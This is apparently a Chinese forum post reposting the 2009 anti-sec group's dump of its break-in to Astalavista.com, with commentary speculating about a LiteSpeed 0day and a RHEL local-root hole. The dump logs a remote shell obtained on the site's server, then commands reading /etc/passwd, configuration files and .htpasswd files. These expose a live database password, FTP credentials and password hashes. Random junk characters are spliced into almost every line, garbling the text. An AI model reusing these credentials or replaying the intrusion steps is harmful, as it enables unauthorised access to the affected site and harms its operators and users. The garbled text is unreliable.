里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。3 }0 j" m2 y5 p$ {/ h; T2 ]8 n
, g8 T x) b3 c& s# F
[root@front3 ~]# curl -I litespeedtech.com2 l+ y) [ f5 U7 a
HTTP/1.1 200 OK
4 ~% U7 B' C8 [Date: Fri, 05 Jun 2009 22:54:51 GMT
+ O) u: p; x# Z# pServer: LiteSpeed+ c! w2 ]; k" v# i* V3 {# K
6 J. t. L* S W+ E1 ]" ]- h另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-* D6 d! ?& u+ u7 y4 Z2 d( L N
" B* J9 M: o; l2 c1 @$ j# @" `8 L
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。7 d) \! w9 t: s8 D9 Q, @% F- {
! e" u2 Z8 ]8 O; e1 A+ Y) w0 ~$ ?
1 g$ S( x) I* d b/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
Z4 Q$ Y4 n- x0 F* ?, F2 b/ _/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \$ ~8 o5 _# }7 H" `
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \3 K: ~# H5 F! R1 E+ N1 n
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /& [6 N5 }$ j2 |' F
\/ \/ \/ \/ \/ \/ \/8 {0 U/ x' A6 L. K6 ]3 }0 D) A2 Z9 ]
The Hacking & Security Community& H" J4 b9 b8 T! Z' _& S2 k) s! g9 p
[+] Founded in 1997 by a hacker computer enthusiast
( R& q8 N6 K) Q; W/ M& F[-] Exposed in 2009 by anti-sec group5 q* C9 U. a5 w3 c7 w
) B: F. s. _5 Z: {2 V, }6 @! i
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:9 l7 r. e$ c2 L0 n
>> 03. Who’s behind the site?
- w$ l. C, {! V* E: P* h- A>>( ?& y5 N( Q+ v) l4 `1 w" K
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
" O7 u8 U5 P3 D& f- R! n9 y5 G* Z/ F0 b; \. C
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?, Z5 K/ K( S& E! a
>>' X, H, n2 j7 b$ W
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
* m& W v5 q* D& T! rmilitary institutions.' r; x- }( K* |7 V+ d" I
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.2 ~& v) W2 p" C
" X; T* A' i( s4 t" F% dWhy has Astalavista been targeted?: ?) c, M/ k% Q! Z$ v+ ?
9 l6 e3 H$ k# oOther than the fact that they are not doing any of this for the “community” but7 F+ Y" m( g7 q6 \
for the money, they spread exploits for kids, claim to be a security community
( n( r8 }4 _7 K8 Q& O. o7 m" l0 x+ X(with no real sense of security on their own servers), and they charge you $6.66
- E6 W# ]% N4 ^# S4 W, hper months to access a dead forum with a directory filled with public releases- `+ F' u! @: F" e( T: v. W
and outdated / broken services.
6 M% a# j8 I& U& L
4 L4 V6 f! V" `+ Y" zWe wanted to see how good that “team of security and IT professionals” really is.
; l6 z0 b; t6 i3 J) r
. q& b4 L2 k/ G% ILet’s begin.2 ~3 @) K, N, L; W& \5 c5 v/ O6 Q) c
! M, b, K; k4 Z4 G- j& L7 Qanti-sec:~# ./g0tshell astalavista.com -p 80
7 d f x0 A4 x4 a- B( @[+] Connecting to astalavista.com:80
8 U# p" V, m# m[+] Grabbing banner…* g; K) C }, T9 w S
LiteSpeed! k% H& A6 w' D" f
[+] Injecting shellcode…* U$ a( }' L/ o5 e8 L c0 A
[-] Wait for it
; ?" y5 o0 Q3 i* O X
5 k/ {: E0 x5 B% u4 C/ o x# w2 @[~] We g0tshell V% y9 b: w3 p1 r; t% Z. k5 S& s) f
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
2 M, u! N+ Q& _9 mID: uid=100(apache) gid=500(apache) groups=500(apache)
! U# m4 o% h* n( G/ F( g+ V3 c) _) x) V4 Z6 g9 I
sh-3.2$ cat /etc/passwd1 ?2 I- y) Y3 ?9 j$ Z
root:x:0:0:root:/root:/bin/bash
0 l5 R$ F6 o+ @! o# M8 l1 `bin:x:1:1:bin:/bin:/sbin/nologin# _8 Y9 P8 X. G! F+ q0 \2 o
daemon:x:2:2:daemon:/sbin:/sbin/nologin! r' O0 h5 E& V. H
adm:x:3:4:adm:/var/adm:/sbin/nologin
) N) Q* H" H) T! xlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin- V' `3 Z- k) [4 l3 T" A0 D9 m
sync:x:5:0:sync:/sbin:/bin/sync
, y* }2 [0 F; M' w! {shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
4 k$ x, @8 b+ a Ghalt:x:7:0:halt:/sbin:/sbin/halt
! s: v* ]. c) X6 `9 omail:x:8:12:mail:/var/spool/mail:/sbin/nologin
3 r+ {$ W6 W' G* Z7 f# i) O9 ^& Fnews:x:9:13:news:/etc/news:! I5 [8 W7 |- `9 W3 z5 W
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin9 k0 @, O7 |1 x" F/ Z' x
operator:x:11:0 perator:/root:/sbin/nologin0 b% a) c; M7 k6 L1 F
games:x:12:100:games:/usr/games:/sbin/nologin
$ I3 n* d. T+ y: |; P( t0 }4 l" Jgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
9 W( ^* j! F2 Q: [' h8 Bftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- _% D: h6 P3 _/ a$ L& T& F( onobody:x:99:99:Nobody:/:/sbin/nologin
% G# t: b7 T6 V# d/ _ b4 grpm:x:37:37::/var/lib/rpm:/sbin/nologin4 \* u j {- x
dbus:x:81:81:System message bus:/:/sbin/nologin
$ D1 H# k: @/ d( z0 w2 r& Z2 F' Onscd:x:28:28:NSCD Daemon:/:/sbin/nologin$ V- h2 Z7 u3 Z7 l+ J/ j
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
1 N0 O# F! K# }& @' ] X7 k! @smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin6 R, i6 U$ a# `6 v/ g
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
" ]9 b6 L5 s% v$ Q& _$ @haldaemon:x:68:68:HAL daemon:/:/sbin/nologin7 z2 }6 e' f( ~, R
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
( j; s1 E4 J/ s- W# _. Rrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
9 @, l& j2 M4 x+ x; B8 Knfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin2 g* {; `7 C, y/ p/ t% ]
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
2 `1 z0 U; }+ g/ P3 ?pcap:x:77:77::/var/arpwatch:/sbin/nologin. i; a) \: h* d
named:x:25:25:Named:/var/named:/sbin/nologin, o3 l6 @& d& d* d$ W7 L
apache:x:100:500::/var/www:/bin/false
5 s& W2 V) V/ vdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
( a! b: @; p5 j% X0 N! J x) Lmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash. D# {& G2 t3 ~' v* x- B; f
webapps:x:500:501::/var/www/html:/bin/bash: S K; k* Z+ @; S4 g8 J% p! |1 c! O4 B
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
7 [, V' |( y: G( k# Q& qadmin:x:501:502::/home/admin:/bin/bash, J: N7 G; m2 ^ h( e) F6 q# J( P
jon:x:502:503::/home/jon:/bin/bash
$ t! i4 C3 _4 y: Gcom:x:503:504::/home/com:/bin/bash
- k, c: }6 B* C4 entp:x:38:38::/etc/ntp:/sbin/nologin( p; F5 I7 C8 ^% t. _" P
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
( {) y: E/ T* \2 j+ c9 Pastanet:x:504:505::/home/astanet:/bin/bash3 V2 B+ N# }8 R9 ^
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
. ~) Q! d, }6 G0 a' }/ yavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin4 x m. {1 ~2 Q) M
8 C4 v' i3 I8 |" D, w& ]( y
sh-3.2$ cat /etc/hosts
3 H, h- g* Y, _' L9 _# Do not remove the following line, or various programs
( s9 L! ]; y. |7 K5 w# that require network functionality will fail.+ f3 [ ~# x( q2 |
127.0.0.1 localhost.localdomain localhost
9 f2 E1 f$ ?- f9 I& o& O; e& x::1 localhost6.localdomain6 localhost6' G( }' X# W4 T0 e* Q$ N' r) B, t
80.74.154.172 asta1.astalavistaserver.com
" y. e. F/ f* R& _: ]+ n7 i9 F! ]8 \. H+ ~; w' d
sh-3.2$ pwd
" \/ p7 v+ q G. l3 ^0 U/home/com/public_html
" O( ^) t( `# |& s$ p+ ?" }5 M" L# L- |& \; D) r
sh-3.2$ ls -la9 O& c! f5 g3 _3 N3 N
total 18460
3 Y9 _2 v z+ f# T7 g rdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
8 ]& e3 c8 e9 sdrwx–x–x 11 com com 4096 Jun 25 2008 ..4 z7 y! S! p3 _
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin+ C; v' x: A9 I9 ?+ Y! q; V4 A
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache" b" H$ g6 f, I( N9 S6 @
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin1 A; `3 ^8 e' g; Z+ y. h4 Q
drwxrwxrwx 2 com com 4096 May 19 00:50 config" F5 |1 p/ H: [8 k; a7 t. l
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
7 r# V2 u1 L+ Y! _' T! G- Ndrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules0 m/ u# s1 N& M' u
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
/ E% n7 y) L N1 Mdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
1 k4 y) E9 N$ R( k6 e# Q9 Bdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
, i: f; R3 U( C# f) X: N5 ?-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php; `/ Y2 K9 V5 L" X+ I
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd: X% n% |# E6 S# {; a. y
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor# @, S/ n$ z9 y$ f$ p1 v' C
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico- S& C3 S( v: X, F$ Y. ]& d; z1 C
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
) g1 L% R+ F4 h6 w-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
}. V2 D1 z" x; p" v-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak" E8 _ G1 M( e) h$ D2 }0 O6 w
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
+ P d9 w# {1 ydrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
- Y' e9 m' S; \: [. p7 A# b$ Sdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
- I: A( O" ]2 r# y5 d# t6 X/ B-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
$ ^! F, ?& }) o7 F5 [drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer5 H! }: [# d+ p, P% e
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang3 R! y$ o" J2 t2 h$ Z1 o' x
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
' c; H& K; w# fdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media* q! l% E2 {1 @
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
) d' }( h3 @- W4 j+ t; f) ?& t% qdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
0 S4 A& P9 l7 @ @; |, `% Kdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
1 }% z0 Q. k0 W; gdrwxrwxr-x 22 com com 4096 May 28 17:06 _new5 D8 v+ k# Q, G2 q* h1 U: c
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old: `. @! x; w2 {' g" J% u
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy# v3 _" m2 I( F$ \* n
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
9 e! E6 d$ o( ?3 h8 o-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
t" K( Z: V4 v6 `3 k-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml9 n4 C. M' I2 |
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
; I, g0 Q2 Y, J- X ]/ `. _+ ~drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes5 Z5 W5 A) ?! i( _: B/ t1 s
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
9 ^; u$ N- R' L3 S6 Kdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
! q1 {& r. h+ G5 b
' n* f% M9 V3 @9 }* Qsh-3.2$ head -20 index.php
v; G* {4 k, L( k1 j<?php
/ M1 b; ?' u6 s' t; O% g# n& @; ^' O6 U
/**7 [7 z. H C4 U3 B# G- _# c5 ^
* The main page for the CMS
" y2 u! y: d* F9 D1 K- K) ` V6 r* @copyright CONTREXX CMS - COMVATION AG
3 k& @0 C. X1 c2 o8 ~4 l0 U* @author Comvation Development Team3 g3 e7 c, v+ c( m$ [3 m7 e. D
* @version v1.0.9.10.1 stable3 ]1 _5 v! _$ ^" X3 j& ]
* @package contrexx
" B3 Z+ u& o# k0 z& h& Z& [4 H* @subpackage core
, \# P0 `6 Q# g4 \) b* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage- j; C' t, O) q
* @since v0.0.0.07 C) _8 c/ @1 H. j! h4 e5 U a3 S
* @todo Capitalize all class names in project
5 ]) w0 F' s$ n& ]4 k r6 W: N# n* @uses /config/configuration.php
3 Y8 a: M! y3 T* @uses /config/settings.php
. V, ~. \4 z- P% E# ^9 t" W* @uses /config/version.php- l. R9 W A7 k' V; f* t, r* F2 ~
* @uses /core/API.php
& c+ K _2 \0 L) E; w- a- Z" L* @uses /core_modules/cache/index.class.php% L! h. z' j, d9 @% S- q
* @uses /core/error.class.php- d2 J9 U( g" n" ~$ ^( t
* @uses /core_modules/banner/index.class.php) m- \" _& |3 J! _4 W; r2 r* I
* @uses /core_modules/contact/index.class.php
, D; F0 G. \9 n3 l8 _% [ d! X5 i% C( V4 [& W
sh-3.2$ cd config/4 p% q+ }/ ^. l- g+ S7 m
sh-3.2$ ls -la
. g x: k/ H6 u- n- ^total 32; O6 a( o& f: k( D. B; Q5 |5 l
drwxrwxrwx 2 com com 4096 May 19 00:50 .
' q- G8 z, y4 ?6 J8 f2 sdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- _$ o, i% m) P9 |9 g-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
' X' Z. B. ?8 z% ~& `0 \ `-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! e5 b+ U; f) T) A. Z4 N+ U$ y
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
# o6 j* Q2 n8 B3 g' _* n0 I. i* D-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php$ M& k7 V/ u2 g4 S: n- F+ s
/ F5 O4 b* G3 u4 J% N0 Jsh-3.2$ cat configuration.php
7 z+ k6 L4 i' d$ g9 T6 J% k; L[snip]1 C" d, k4 |' s# ^
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost$ }9 t% ~) H+ W/ k
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
/ @ j' I/ D7 D% z$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix3 C+ ?3 E3 m8 x
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username0 q; { L. L: o' C" `' S
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
+ D* @* k7 o1 M4 P, I$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
/ X5 [0 W; o$ I, ?4 k$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..), B: t1 t) K' j" w5 E" ~
[snip]) L& D. u4 y( F9 H9 M( N% C
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
; d& A6 G7 f3 e& `" `8 z! S9 U% p, H$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode: [- T1 U2 F9 _# n: A- g5 \0 v F
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost' o% F) J- b# }' N
$_FTPCONFIG['port'] = 21; // Ftp remote port& z) \& j9 e7 S
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username* Q" K; d' b/ R& W% T; S3 \
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password1 R7 q5 U; ~3 f, X
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
1 G* a9 t- o" H' q% l- f" E
- f/ [* O5 N: g5 h' _' H% Tsh-3.2$ cd .. {0 c$ h2 k6 V$ c; ~
sh-3.2$ cd dvd/$ `( f C! S1 z2 P/ ]
sh-3.2$ ls -la
$ w- d6 w6 _& |total 2913780% i9 s8 R" V' b: ~
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
6 Z) W- V# w% F: d' c8 l( wdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 F* v+ _$ ^4 }" ~% w
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
/ @% g3 [) j9 d1 X* t-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
# F$ T( D R" t G9 ~# c( p5 g& B-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar# U! ~4 \" }0 s' A0 K' h# @
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess4 R# J! @+ b1 [3 _2 i6 N% i
: ~! x) F# |" ~# @- bsh-3.2$ cat .htaccess
% a9 d, h0 d. }' S8 ?7 jauthType Basic
8 h4 j6 i$ q: A1 v( U9 kauthName DVD
* @$ m* {2 [+ X# RauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd( n4 B- X: i0 m. {2 t) U) Q, |
require valid-user
5 V$ `$ Q# `+ f6 _9 l% z, K8 ?* r8 N3 k+ D7 M
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
+ j' G! {% ]0 m$ l4 C) f3 f7 PDVDdownload:CRD8cuY6.MPT6
/ X \# _' O; ?3 t1 fDVDdownload2:CR8a36.wluFMg: [2 B( c. F+ e" _
# ~6 T3 V% |2 i% }: Wsh-3.2$ cat test.php
4 z3 ^& Z2 n' g<?php
* ^& m" Z$ M" d1 y6 W0 g y$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
4 ~- Z# u7 w! [& L) z$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url))); d' z; D% L" Q- f
echo $url;, ?2 A! I; i+ }. H# [2 `
?>6 I* q b3 W% Y
0 B7 Z8 y/ }7 ?" f8 n
sh-3.2$ cd modifications/
$ r$ x5 Z! |0 N! Esh-3.2$ ls -la4 d# [* u- q: T
total 32
) \3 v* i( h _: g. ldrwxr-xr-x 8 com com 4096 May 11 12:48 .3 s) [# w |# l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..) ]& ?$ F3 K! `4 O1 {& }
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
1 b1 @* N3 z7 V9 D8 |+ a9 hdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
; ^! d) m- |& `0 |drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
* H# J% E, b) Z% \( w" S/ ldrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
+ W9 T! R( f8 S1 @drwxr-xr-x 2 com com 4096 Feb 2 19:33 search2 X2 S' d0 G: C9 l
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
; w1 k, E2 x2 ]; q( \* W; Q' _2 J# e
sh-3.2$ ls -R
* f! K$ d3 `3 y# g& x! X.:3 R8 a9 N8 }. o \0 t
com_avtng cronjobs onlinetools pjirc search _tmp
& {" S, I. J2 s
+ H3 E8 U! t- {$ M$ d X3 B./com_avtng:
8 @- ^* K; r2 C' x2 t: a$ ~avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
; T& S3 B$ P1 W& K1 i# N1 e2 S" p# N# l V- T) X- E9 b9 y) Q k
./com_avtng/scripts:
, z2 }" s+ j3 O8 }8 O- Q+ lpopunder.js4 l! {" j$ g( f0 a+ R: I
# j* \ {% f1 ~' B" k6 O N E./cronjobs:8 {, h3 U: b6 M* w% d- e2 r" S
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp: U( Q n- T" x$ A3 X* w# o6 m
+ q! G- M0 j$ ~6 {; I4 ?
./cronjobs/tmp:
& B# O7 I* w( @ h1 r4 n" [( Wcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv3 K1 n4 s0 q I
; l2 V9 ]$ A1 V/ l( g1 p9 M1 ?
./onlinetools:
% [/ }/ F- K! H1 uindex.php( y0 N- ^, H# v0 c
* G& F7 `* X$ S./pjirc:! Z) N0 P1 H& k. u
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt6 Y- o1 c( O3 ]- H; Y, E2 D
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
9 \: {; I2 |; n6 O. S$ E; jbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
4 E1 [! N& T2 f* T, _
+ U7 h1 U/ f* h; w, V! O./pjirc/img:/ `* V8 c8 f/ f8 R
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
% K9 H$ C* Y0 a% F& c% r* c3 Jarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 6 f& H' i$ V& t
verre-eau.gif
, e8 I4 }: k% |3 B4 ~argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
! J5 ?, N7 c0 Z7 lverre-vin.gif# `: x. i+ C8 O) g% Q% q8 C2 o2 A
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif& l; T/ t$ b) I! M" l
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif" D6 v' M. I! E% _# ?
; h' F/ ^% t3 j m. a
./pjirc/snd:
- Z9 w. s; H' b, t3 C3 ~bell2.au ding.au
( X; T1 y+ V0 a% Q3 X% r- F0 t
) f/ b3 j" t' U./search:
9 Q( G: c: v- I2 [3 j) t5 y! ]searchEngines.php search.php
& J l* R5 u9 [$ F0 B# k! d X, X \2 i, h# F
./_tmp:
4 d1 U: n/ ?+ q7 DdefaultPorts.php defaultPorts.txt4 k7 t( b5 a$ Q" a" x K( J
3 s% \% w: ?& z; d% ]sh-3.2$ cd cronjobs/" e y- f# E( ~1 e/ T) r
sh-3.2$ cat exploits.php
+ Y4 h# M" p. B$ O/ W- f[snip]/ q; e( D- S' K( F
$categories = array();& J! m; Z3 H2 x' o- y
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
# T2 ?9 _) @$ O6 S9 d5 i( N' o$expolits = file($milw0rmFile);/ B- n1 p( _3 F- W, o
$comExploits = array();! Y) u( K7 Q W; y% g7 t4 e
[snip]
; }/ U: c, r; k9 i// manage data6 i) o" M0 M& n/ \% F2 n
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
2 t# m! k/ U! f) B! ^/ g) A, S2 C
6 n9 G' d, e! d/ o4 O // get path and title" K6 ^' q# q& D3 Q) c
$expolits[$x] = trim($expolits[$x]);
5 {/ t& v1 I; j# ?% ~, K5 O $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));( l L7 a- U8 H2 a' W9 ]
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
~- q Y/ E0 M1 W; x* i
: y& _# Y7 i" J1 P0 [ // check if file exists/ j% n. K } J: C ]
if (file_exists($path)) {9 k4 X: J; X5 q( T8 c+ L- O
4 W/ S& x' n9 U9 n2 Z% r $text = file_get_contents($path);
6 E N7 d; o, b3 g/ Q
7 |4 C' Y8 @! R& N // get content and date
8 z. D) i7 N% ^/ u( H; Z //$text = htmlspecialchars($text, ENT_QUOTES);
6 N& N2 A( Q- K0 @9 o% @ $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″)); H; }, J( f$ Y
if ($tmptext != ”) {
6 S$ F l/ F A. l3 Z& |; d) r $text = $tmptext;
: L! ^- ~9 U3 X, E. S } else {2 a% s/ M& t! a* i+ y6 y
$text = addslashes(htmlentities($text, ENT_QUOTES));
6 y* t% O6 ?( _, @" {" \/ J$ | }5 @/ T+ Z a3 |5 n/ [
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
( `& z% v& Z0 o: `1 j $tmp = explode('-', $date);( n& e+ v( O; \6 _) C
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
& m6 ]6 ^. z" ] v$ y) ^ $cat = getCategory ($path);' E$ u# E8 @1 s
$ext = pathinfo(basename($path));
' b5 F' L; B( W% Q $ext = $ext['extension'];, _) m- ~3 w! ~
$qStr = ”
. T# w" o7 N' _% V SELECT `id`
0 K. D4 l- w* b' D. C2 X0 n0 f* F1 o FROM `contrexx_module_exploits`
! r0 z7 j" n" S* t+ d1 J3 O( } WHERE `title` = ‘” . $title . “‘
' t/ K2 Z x1 J7 p) m AND `date` = ‘” . $date . “‘
6 r$ ]# S% J' \0 E, i “;" ?; s, ~+ c# x) Q" y( E
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;: ?1 W* e, p5 t5 g" |
$q = $_objDB->query($qStr);
2 {9 U; T0 K& ~2 q8 W/ d% O+ k5 K" O
2 @7 ^; T: k7 y' ?0 ^ if ($q->numRows() == 0) {
. o2 d! {% i& O
2 q4 n t0 G7 g' v // prepare array
7 m3 x2 y; f8 L3 K5 o- o9 c" c $comExploits[$x]['date'] = $date;
, N6 Z! ?" }7 b k# ~1 y5 E $comExploits[$x]['title'] = $title;
2 q* D2 l% b- _; }( a2 O $comExploits[$x]['author'] = ‘milw0rm’;- B3 m/ \- O% w" i
$comExploits[$x]['text'] = $text;
# q# v! E$ g% n$ t: P1 @% Y/ F $comExploits[$x]['source'] = $ext;# w3 N6 U! U. J# J7 Y
$comExploits[$x]['url1'] = ”;
) \; V" w# R1 K8 H9 h- S, K+ _ $comExploits[$x]['url2'] = ”;4 N, o0 F+ e; I5 Z; O5 F
$comExploits[$x]['catid'] = $cat;. m# m6 y: R4 q, p
$comExploits[$x]['lang'] = ‘2′;
/ v% i+ _. D0 t# X8 X2 |' B $comExploits[$x]['userid'] = ‘12′;
( \) W, A' ]# X1 }0 z8 `0 F A $comExploits[$x]['startdate'] = ‘0000-00-00′;7 X& l/ r1 a2 C0 s( d. H0 q; l
$comExploits[$x]['enddate'] = ‘0000-00-00′;
( F( }& g2 A- ]) H% Z( Y $comExploits[$x]['status'] = ‘1′; ~; K3 O0 X" g/ O- Z: V
$comExploits[$x]['changelog'] = $date;+ ^& r& t" `7 a( o* b, v
" V! i$ Y# [& {$ J1 J }
# W/ u/ ~# o* e# A+ [. Z; e# _; w[snip]
; w( y1 ^5 d( s# U' ~( M $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
, W0 t4 Q- d9 ?1 l) t M<rss version=”2.0″>; e$ B4 w+ q$ u
<channel>* j) d7 P6 I/ V% s
<title>ASTALAVISTA.com - Exploits</title>2 y& x5 v5 E5 V1 {* Q
<link>http://www.astalavista.com/exploits</link># V/ o' x$ s4 W$ V ~
<description>All availably Exploits.</description>
